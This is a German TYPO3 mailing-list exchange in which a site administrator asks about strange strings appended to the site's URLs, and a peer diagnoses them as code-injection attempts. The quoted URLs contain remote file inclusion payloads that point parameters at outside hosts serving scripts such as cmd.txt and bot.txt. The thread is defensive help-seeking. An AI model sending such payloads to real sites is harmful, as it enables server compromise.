Hallo Da'oud al-Sahing schrieb: > Hallo zusammen! > > Bei einer Typo3-Installation werden ind unregelmässigen Abständen die > generierten URLs um fremde Einträge erweitert. BSP: > - > http://www.xxxxxxx.ch/index.php?id=7&L=0index.php?id=41/index.php?id=http://www.oaltouruguai.com.br/Fuploads/bot.txt? > - > http://www.xxxxxxx.ch/index.php?id=6&L=1index.php?id=6/index.php?id=http://www.freewebtown.com/sclipicius/evilx? > - > http://www.xxxxxxx.ch/index.php?id=6&L=1index.php?id=7/index.php?id=http://2msdance.com/language/cmd.txt? > - > http://www.xxxxxxx.ch/index.php?id=9&L=1index.php?iid=7/index.php?id=http://evilarmy.hostcentric.com/vop.pid? > - > http://www.xxxxxxx.ch/index.php?id=9&L=http://m00.laughingllamas.com/fileupload/store/check.txt? > - > http://www.xxxxxxx.ch/index.php?id=42&L=1index.php?id=7/index.php?id=http://zarafshan.ru/uploads/cmd.txt? > > Wie man sieht wurden die Werte einfach an die reguläre Typo3-Url angehängt. > Die Links verwiesen meist aus nicht existente Dateien, Domains waren auch so > gut wie nie erreichbar. Ich denke, dass diese Modifikationen deshalb keine > Wirkung hatten. > Jedoch ist das ganze nicht sehr schön anzuschauen - zumal auf einer > Rentenwebsite vorhanden. > > Kennt jemand solche Probleme? Eventuell mit einer Lösung? Wäre euch riesig > dankbar! > Wo hast du die Links denn entdeckt? In den LOG Dateien deines Servers oder sind die Seiten modifiziert? Da ich kürzlich mal mit einer gehackten Joomla Seite zu tun hatte kommen mir ein paar der in den Links vorkommenden Namen recht bekannt vor. So lange diese Aufrufe nur in deinen LOG Dateien sind ist da wohl kein größere Gefahr, da dann offenbar "nur" jemand versucht hat dir ein Code Injection zu machen. Da ist bei Typo3 im Moment aber wohl kein größeres Loch bekannt (zumindest mir nicht). Wenn sich allerdings deine Links auf deiner Seite ändern würde das ja bedeuten, dass da jemand Zugang auf dein BE hat oder ein Loch im Typo gefunden hat über der er das ändern kann. Dann würde ich mir Sorgen machen und mal genau den Datenverkeht und die Zugriffe auf den Server beobachten. Hinter diesen netten *.txt Dateien verstecken sich übrigens meist irgendwelche Defacment Tools, Massenmailer oder sonst so ein Drreck irgendwelcher Scriptkiddies.
Bernd -- nMedien, Schuhmacher & Schuhmacher GbR Donaustraße 4 66424 Homburg Tel.: 06848/730664 FAX: 06848/72145 Email: [EMAIL PROTECTED] Web: http://www.nmedien.de _______________________________________________ TYPO3-german mailing list TYPO3-german@lists.netfielders.de http://lists.netfielders.de/cgi-bin/mailman/listinfo/typo3-german